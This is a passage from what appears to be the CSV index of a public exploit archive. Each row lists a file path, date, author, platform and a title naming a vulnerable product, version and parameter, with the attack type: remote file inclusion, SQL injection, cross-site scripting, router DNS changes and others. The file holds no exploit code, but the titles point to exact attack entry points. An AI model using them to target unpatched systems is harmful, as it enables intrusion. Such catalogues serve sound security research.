Storage Website - '/admin/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29415,exploits/php/webapps/29415.txt,"Magic Photo Storage Website - '/admin/list_members.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -40369,exploits/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29416,exploits/php/webapps/29416.txt,"Magic Photo Storage Website - '/admin/membership_pricing.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29417,exploits/php/webapps/29417.txt,"Magic Photo Storage Website - '/admin/send_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29418,exploits/php/webapps/29418.txt,"Magic Photo Storage Website - '/include/config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29419,exploits/php/webapps/29419.txt,"Magic Photo Storage Website - '/include/db_config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29420,exploits/php/webapps/29420.txt,"Magic Photo Storage Website - '/user/add_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29421,exploits/php/webapps/29421.txt,"Magic Photo Storage Website - '/user/add_news.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29422,exploits/php/webapps/29422.txt,"Magic Photo Storage Website - '/user/change_catalog_template.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29423,exploits/php/webapps/29423.txt,"Magic Photo Storage Website - '/user/couple_milestone.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29424,exploits/php/webapps/29424.txt,"Magic Photo Storage Website - '/user/couple_profile.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29425,exploits/php/webapps/29425.txt,"Magic Photo Storage Website - '/user/delete_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29426,exploits/php/webapps/29426.txt,"Magic Photo Storage Website - '/user/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29427,exploits/php/webapps/29427.txt,"Magic Photo Storage Website - '/user/login.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29428,exploits/php/webapps/29428.txt,"Magic Photo Storage Website - '/user/logout.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29429,exploits/php/webapps/29429.txt,"Magic Photo Storage Website - '/user/register.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29430,exploits/php/webapps/29430.txt,"Magic Photo Storage Website - '/user/upload_photo.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29431,exploits/php/webapps/29431.txt,"Magic Photo Storage Website - '/user/user_catelog_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29432,exploits/php/webapps/29432.txt,"Magic Photo Storage Website - '/user/user_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29433,exploits/php/webapps/29433.txt,"Magic Photo Storage Website - '/user/user_extend.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29434,exploits/php/webapps/29434.txt,"Magic Photo Storage Website - '/user/user_membership_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29435,exploits/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",multiple,webapps, -29437,exploits/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps, -29438,exploits/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps, -29442,exploits/php/webapps/29442.html,"phpBB 2.0.21 - 'privmsg.php' HTML Injection",2007-01-11,Demential,php,webapps, -36794,exploits/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps, -29450,exploits/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps, -29451,exploits/php/webapps/29451.txt,"All In One Control Panel 1.3.x - 'cp_downloads.php?did' SQL Injection",2007-01-12,Coloss,php,webapps, -29453,exploits/php/webapps/29453.php,"PHP-Nuke 7.x - 'Block-Old_Articles.php' SQL Injection",2007-01-13,Paisterist,php,webapps, -29456,exploits/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,asp,webapps, -29457,exploits/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,asp,webapps, -29477,exploits/php/webapps/29477.txt,"Indexu 5.0/5.3 - 'upgrade.php?gateway' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps, -29478,exploits/php/webapps/29478.txt,"Indexu 5.0/5.3 - 'suggest_category.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps, -29479,exploits/php/webapps/29479.txt,"Indexu 5.0/5.3 - 'user_detail.php?u' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps, -29480,exploits/php/webapps/29480.txt,"Indexu 5.0/5.3 - 'tell_friend.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29481,exploits/php/webapps/29481.txt,"Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29464,exploits/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - 'AdminLien.php' Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps, -29466,exploits/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps, -29468,exploits/php/webapps/29468.txt,"Jax Petition Book 3.06 - 'jax_petitionbook.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps, -29469,exploits/php/webapps/29469.txt,"Jax Petition 3.06 Book - 'smileys.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps, -29472,exploits/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps, -29482,exploits/php/webapps/29482.php,"WordPress Theme Kernel - Arbitrary File Upload",2013-11-07,link_satisi,php,webapps, -29483,exploits/php/webapps/29483.txt,"Indexu 5.0/5.3 - 'send_pwd.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29484,exploits/php/webapps/29484.txt,"Indexu 5.0/5.3 - 'search.php?keyword' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps, -29485,exploits/php/webapps/29485.txt,"Indexu 5.0/5.3 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29486,exploits/php/webapps/29486.txt,"Indexu 5.0/5.3 - 'power_search.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29487,exploits/php/webapps/29487.txt,"Indexu 5.0/5.3 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29488,exploits/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps, -29489,exploits/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps, -29491,exploits/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps, -40368,exploits/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29492,exploits/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps, -29497,exploits/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps, -29498,exploits/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps, -29499,exploits/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps, -29500,exploits/asp/webapps/29500.txt,"RASPcalendar 1.01 (ASP) - Admin Login",2013-11-08,"Hackeri-AL UAH-Crew",asp,webapps, -29504,exploits/php/webapps/29504.txt,"Unique Ads - 'Banner.php' SQL Injection",2007-01-22,Linux_Drox,php,webapps, -29505,exploits/php/webapps/29505.txt,"212Cafe Board - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,Linux_Drox,php,webapps, -29506,exploits/php/webapps/29506.txt,"Bitweaver 1.3.1 Articles and Blogs - Multiple Cross-Site Scripting Vulnerabilities",2007-01-22,CorryL,php,webapps, -29507,exploits/php/webapps/29507.txt,"212Cafe Guestbook 4.00 - 'show.php' Cross-Site Scripting",2007-01-22,Linux_Drox,php,webapps, -29508,exploits/php/webapps/29508.sh,"Vote! Pro 4.0 - Multiple PHP Code Execution Vulnerabilities",2007-01-23,r0ut3r,php,webapps, -30029,exploits/php/webapps/30029.txt,"SonicBB 1.0 - 'search.php' Cross-Site Scripting",2007-05-14,"Jesper Jurcenoks",php,webapps, -30031,exploits/ios/webapps/30031.txt,"Imagam iFiles 1.16.0 iOS - Multiple Web Vulnerabilities",2013-12-04,Vulnerability-Lab,ios,webapps, -30085,exploits/linux/webapps/30085.txt,"Zimbra 2009-2013 - Local File Inclusion",2013-12-06,rubina119,linux,webapps, -30035,exploits/php/webapps/30035.txt,"SonicBB 1.0 - Multiple SQL Injections",2007-05-14,"Jesper Jurcenoks",php,webapps, -30036,exploits/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",php,webapps, -30040,exploits/php/webapps/30040.txt,"Jetbox CMS 2.1 Email - 'FormMail.php' Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps, -30041,exploits/php/webapps/30041.txt,"Jetbox CMS 2.1 - '/view/search/?path' Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps, -30042,exploits/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",php,webapps, -30047,exploits/php/webapps/30047.txt,"vBulletin 3.6.6 - 'calendar.php' HTML Injection",2007-05-16,"laurent gaffie",php,webapps, -30048,exploits/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - 'ShopContent.asp' Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps, -30050,exploits/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - 'header.php?s' Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps, -30051,exploits/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps, -30053,exploits/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps, -30054,exploits/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent",2013-12-05,Vulnerability-Lab,jsp,webapps, -30055,exploits/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps, -30201,exploits/php/webapps/30201.txt,"Fuzzylime 1.0 - 'Low.php' Cross-Site Scripting",2007-06-18,RMx,php,webapps, -30156,exploits/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps, -30200,exploits/php/webapps/30200.txt,"PHP Hosting Biller 1.0 - 'index.php' Cross-Site Scripting",2007-08-18,Serapis.net,php,webapps, -30015,exploits/php/webapps/30015.txt,"Advanced Guestbook 2.4.2 - 'Lang' Cookie Local File Inclusion",2007-05-08,netVigilance,php,webapps, -30022,exploits/php/webapps/30022.txt,"PHP Multi User Randomizer 2006.09.13 - 'Configure_Plugin.TPL.php' Cross-Site Scripting",2007-05-10,the_Edit0r,php,webapps, -30027,exploits/php/webapps/30027.txt,"CommuniGate Pro 5.1.8 - Web Mail HTML Injection",2007-05-12,"Alla Bezroutchko",php,webapps, -30028,exploits/php/webapps/30028.txt,"EQdkp 1.3.1 - Cross-Site Scripting",2007-05-12,kefka,php,webapps, -29512,exploits/php/webapps/29512.txt,"Vanilla Forums 2.0 < 2.0.18.5 - 'class.utilitycontroller.php' PHP Object Injection",2013-11-08,EgiX,php,webapps,80 -29514,exploits/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 -29515,exploits/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 -29516,exploits/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps, -29517,exploits/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php?objectId' SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 -29518,exploits/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 -29519,exploits/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 -29521,exploits/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps, -29522,exploits/php/webapps/29522.py,"WordPress 1.x/2.0.x - Pingback SourceURI Denial of Service / Information Disclosure",2007-01-24,"Blake Matheny",php,webapps, -29525,exploits/php/webapps/29525.txt,"WordPress Theme Highlight Premium - Cross-Site Request Forgery / Arbitrary File Upload",2013-11-10,DevilScreaM,php,webapps, -29529,exploits/php/webapps/29529.txt,"PHP Membership Manager 1.5 - 'admin.php' Cross-Site Scripting",2007-01-26,Doz,php,webapps, -29530,exploits/php/webapps/29530.txt,"FD Script 1.3.x - 'FName' Information Disclosure",2007-01-26,ajann,php,webapps, -29533,exploits/asp/webapps/29533.html,"AdMentor - Admin Login SQL Injection",2007-01-27,Cr@zy_King,asp,webapps, -29534,exploits/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 - 'Show_Webfeed.php' SQL Injection",2007-01-27,St[at]rExT,php,webapps, -29537,exploits/php/webapps/29537.txt,"MDPro 1.0.76 - 'index.php' SQL Injection",2007-01-27,adexior,php,webapps, -29539,exploits/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps, -29677,exploits/php/webapps/29677.txt,"Audins Audiens 3.3 - 'setup.php?PATH_INFO' Cross-Site Scripting",2007-02-26,r00t,php,webapps, -29678,exploits/php/webapps/29678.txt,"Audins Audiens 3.3 - '/system/index.php?Cookie PHPSESSID' SQL Injection",2007-02-26,r00t,php,webapps, -29679,exploits/php/webapps/29679.html,"PHPBB2 - 'Admin_Ug_Auth.php' Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps, -29680,exploits/php/webapps/29680.html,"SQLiteManager 1.2 - 'main.php' Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps, -29681,exploits/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps, -29682,exploits/php/webapps/29682.txt,"WordPress 2.1.1 - 'post.php' Cross-Site Scripting",2007-02-26,Samenspender,php,webapps, -29684,exploits/php/webapps/29684.txt,"WordPress 2.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-02-27,"Stefan Friedli",php,webapps, -29544,exploits/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation",2013-11-12,"Sense of Security",php,webapps, -36816,exploits/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection",2015-04-22,"TUNISIAN CYBER",php,webapps,80 -29811,exploits/jsp/webapps/29811.txt,"Atlassian JIRA 3.4.2 - IssueNavigator.JSPA Cross-Site Scripting",2007-04-02,syniack,jsp,webapps, -29556,exploits/php/webapps/29556.txt,"OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion",2007-01-31,trzindan,php,webapps, -29557,exploits/php/webapps/29557.txt,"OpenEMR 2.8.2 - 'Login_Frame.php' Cross-Site Scripting",2007-01-31,"Michael Melewski",php,webapps, -29559,exploits/php/webapps/29559.txt,"EasyMoblog 0.5.1 - Multiple Input Validation Vulnerabilities",2007-02-02,"Tal Argoni",php,webapps, -29560,exploits/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps, -29561,exploits/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps, -29562,exploits/php/webapps/29562.txt,"PortailPHP 2 - '/mod_news/index.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps, -29563,exploits/php/webapps/29563.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps, -29564,exploits/php/webapps/29564.txt,"PortailPHP 2 - '/mod_news/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps, -29565,exploits/php/webapps/29565.txt,"PortailPHP 2 - '/mod_news/goodies.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps, -29566,exploits/php/webapps/29566.txt,"PortailPHP 2 - '/mod_search/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps, -29567,exploits/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps, -29568,exploits/php/webapps/29568.txt,"Coppermine Photo Gallery 1.4.10 - Multiple Local/Remote File Inclusions",2007-02-05,anonymous,php,webapps, -29569,exploits/php/webapps/29569.txt,"MySQLNewsEngine - 'Affichearticles.php3' Remote File Inclusion",2007-02-06,Blaster,php,webapps, -29570,exploits/hardware/webapps/29570.txt,"TOSHIBA e-Studio 232/233/282/283 - Cross-Site Request Forgery (Change Admin Password)",2013-11-13,"Hubert Gradek",hardware,webapps, -29571,exploits/php/webapps/29571.txt,"SYSCP 1.2.15 - System Control Panel CronJob Arbitrary Code Execution",2007-02-07,"Daniel Schulte",php,webapps, -29572,exploits/php/webapps/29572.txt,"cPanel 11 - PassWDMySQL Cross-Site Scripting",2007-02-08,s3rv3r_hack3r,php,webapps, -29574,exploits/php/webapps/29574.php,"eXtreme File Hosting - Arbitrary '.RAR' File Upload",2007-02-09,"hamed bazargani",php,webapps, -29576,exploits/jsp/webapps/29576.txt,"Atlassian JIRA 3.7.3 - BrowseProject.JSPA Cross-Site Scripting",2007-02-09,BL4CK,jsp,webapps, -29578,exploits/php/webapps/29578.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tagviewer.php' Multiple Remote File Inclusions",2007-02-12,K-159,php,webapps, -29579,exploits/php/webapps/29579.txt,"Tagit! Tagit2b 2.1.B Build 2 - 'tag_process.php' Multiple Remote File Inclusions",2007-02-12,K-159,php,webapps, -29580,exploits/php/webapps/29580.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/CONFIG/errmsg.inc.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29581,exploits/php/webapps/29581.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/addTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29582,exploits/php/webapps/29582.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/ban_watch.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29583,exploits/php/webapps/29583.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/delTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29584,exploits/php/webapps/29584.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/delTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29585,exploits/php/webapps/29585.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/editTagmin.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29586,exploits/php/webapps/29586.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/editTag.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29587,exploits/php/webapps/29587.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/manageTagmins.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29588,exploits/php/webapps/29588.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/verify.php?configpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29589,exploits/php/webapps/29589.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/index.php?adminpath' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29590,exploits/php/webapps/29590.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/readconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29591,exploits/php/webapps/29591.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updateconf.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29592,exploits/php/webapps/29592.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/updatefilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29593,exploits/php/webapps/29593.txt,"Tagit! Tagit2b 2.1.B Build 2 - '/tagmin/wordfilter.php?Admin' Remote File Inclusion",2007-02-12,K-159,php,webapps, -29596,exploits/asp/webapps/29596.txt,"EWay 4 - Default.APSX Cross-Site Scripting",2007-02-12,"BLacK ZeRo",asp,webapps, -29597,exploits/asp/webapps/29597.txt,"Community Server - 'SearchResults.aspx' Cross-Site Scripting",2007-02-12,BL4CK,asp,webapps, -29598,exploits/php/webapps/29598.txt,"WordPress 1.x/2.0.x - 'Templates.php' Cross-Site Scripting",2007-02-12,PsychoGun,php,webapps, -29599,exploits/php/webapps/29599.txt,"TaskFreak! 0.5.5 - 'error.php' Cross-Site Scripting",2007-02-13,Spiked,php,webapps, -29600,exploits/asp/webapps/29600.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' Cross-Site Scripting",2007-02-13,ShaFuck31,asp,webapps, -29601,exploits/asp/webapps/29601.txt,"Fullaspsite ASP Hosting Site - 'listmain.asp?cat' SQL Injection",2007-02-13,ShaFuck31,asp,webapps, -29602,exploits/php/webapps/29602.txt,"WebTester 5.0.20060927 - 'typeID' SQL Injection",2007-02-14,"Moran Zavdi",php,webapps, -29604,exploits/php/webapps/29604.txt,"ibProArcade 2.5.9+ - 'Arcade.php' SQL Injection",2007-02-15,sp00k,php,webapps, -29605,exploits/php/webapps/29605.txt,"Deskpro 1.1 - 'faq.php' Cross-Site Scripting",2007-02-15,"BLacK ZeRo",php,webapps, -29606,exploits/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,php,webapps, -29676,exploits/php/webapps/29676.txt,"Audins Audiens 3.3 - 'unistall.php' Authentication Bypass",2007-02-26,r00t,php,webapps, -29608,exploits/php/webapps/29608.txt,"CedStat 1.31 - 'index.php?hier' Cross-Site Scripting",2007-02-16,sn0oPy,php,webapps, -29609,exploits/php/webapps/29609.txt,"Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion",2007-02-16,KaRTaL,php,webapps, -29610,exploits/php/webapps/29610.txt,"Ezboo Webstats 3.03 - Administrative Authentication Bypass",2007-02-16,sn0oPy,php,webapps, -29611,exploits/asp/webapps/29611.txt,"Turuncu Portal 1.0 - 'H_Goster.asp' SQL Injection",2007-02-16,chernobiLe,asp,webapps, -29612,exploits/hardware/webapps/29612.txt,"WBR-3406 Wireless Broadband NAT Router - Web-Console Password Change Bypass / Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,webapps, -29615,exploits/php/webapps/29615.txt,"Powerschool 4.3.6/5.1.2 - JavaScript File Request Information Disclosure",2007-02-19,gheetotank,php,webapps, -29621,exploits/php/webapps/29621.txt,"AbleDesign MyCalendar 2.20.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-20,sn0oPy,php,webapps, -29622,exploits/asp/webapps/29622.txt,"Design4Online - 'Userpages2 Page.asp' SQL Injection",2007-02-20,xoron,asp,webapps, -29623,exploits/cgi/webapps/29623.txt,"Google Desktop - Cross-Site Scripting",2007-02-21,"Yair Amit",cgi,webapps, -29624,exploits/php/webapps/29624.txt,"CedStat 1.31 - 'index.php' Cross-Site Scripting",2007-02-21,sn0oPy,php,webapps, -29625,exploits/php/webapps/29625.txt,"phpTrafficA 1.4.1 - 'plotStat.php?File' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps, -29626,exploits/php/webapps/29626.txt,"phpTrafficA 1.4.1 - 'banref.php?lang' Traversal Local File Inclusion",2007-02-21,"Hamid Ebadi",php,webapps, -29627,exploits/php/webapps/29627.php,"Magic News Plus 1.0.2 - 'preview.php?PHP_script_path' Remote File Inclusion",2007-02-21,"HACKERS PAL",php,webapps, -29628,exploits/php/webapps/29628.txt,"Magic News Plus 1.0.2 - 'news.php?&link_parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps, -29629,exploits/php/webapps/29629.txt,"Magic News Plus 1.0.2 - 'n_layouts.php?link_parameters' Cross-Site Scripting",2007-02-21,"HACKERS PAL",php,webapps, -29631,exploits/php/webapps/29631.txt,"Pyrophobia 2.1.3.1 - Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps, -29632,exploits/php/webapps/29632.txt,"Pyrophobia 2.1.3.1 - Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps, -29633,exploits/ios/webapps/29633.txt,"Google Gmail IOS Mobile Application - Persistent Cross-Site Scripting",2013-11-16,"Ali Raza",ios,webapps, -29634,exploits/php/webapps/29634.txt,"Plantilla - 'list_main_pages.php?nfolder' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps, -29635,exploits/php/webapps/29635.txt,"Pheap 1.x/2.0 - 'edit.php' Directory Traversal",2007-02-22,"laurent gaffie",php,webapps, -29636,exploits/php/webapps/29636.txt,"LoveCMS 1.4 - 'step' Remote File Inclusion",2007-02-22,"laurent gaffie",php,webapps, -29637,exploits/php/webapps/29637.txt,"LoveCMS 1.4 - 'step' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps, -29638,exploits/php/webapps/29638.txt,"LoveCMS 1.4 - 'load' Traversal Arbitrary File Access",2007-02-22,"laurent gaffie",php,webapps, -29639,exploits/php/webapps/29639.txt,"LoveCMS 1.4 - 'id' Cross-Site Scripting",2007-02-22,"laurent gaffie",php,webapps, -29640,exploits/php/webapps/29640.txt,"Shop Kit Plus - 'StyleCSS.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps, -29641,exploits/php/webapps/29641.txt,"XT:Commerce 3.04 - 'index.php' Local File Inclusion",2007-02-23,"laurent gaffie",php,webapps, -29642,exploits/php/webapps/29642.txt,"Simple one-file Gallery - 'gallery.php?f' Traversal Arbitrary File Access",2007-02-23,"laurent gaffie",php,webapps, -29643,exploits/php/webapps/29643.txt,"Simple one-file Gallery - 'gallery.php?f' Cross-Site Scripting",2007-02-23,"laurent gaffie",php,webapps, -29644,exploits/php/webapps/29644.txt,"Pickle 0.3 - 'download.php' Local File Inclusion",2007-02-24,"laurent gaffie",php,webapps, -29645,exploits/php/webapps/29645.txt,"Active Calendar 1.2 - 'showcode.php' Local File Inclusion",2007-02-24,"Simon Bonnard",php,webapps, -29646,exploits/php/webapps/29646.txt,"Active Calendar 1.2 - '/data/flatevents.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29647,exploits/php/webapps/29647.txt,"Active Calendar 1.2 - '/data/js.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29648,exploits/php/webapps/29648.txt,"Active Calendar 1.2 - '/data/m_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29649,exploits/php/webapps/29649.txt,"Active Calendar 1.2 - '/data/m_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29650,exploits/php/webapps/29650.txt,"Active Calendar 1.2 - '/data/m_4.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29651,exploits/php/webapps/29651.txt,"Active Calendar 1.2 - '/data/y_2.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29652,exploits/php/webapps/29652.txt,"Active Calendar 1.2 - '/data/y_3.php?css' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29653,exploits/php/webapps/29653.txt,"Active Calendar 1.2 - '/data/mysqlevents.php?css' Cross-Site 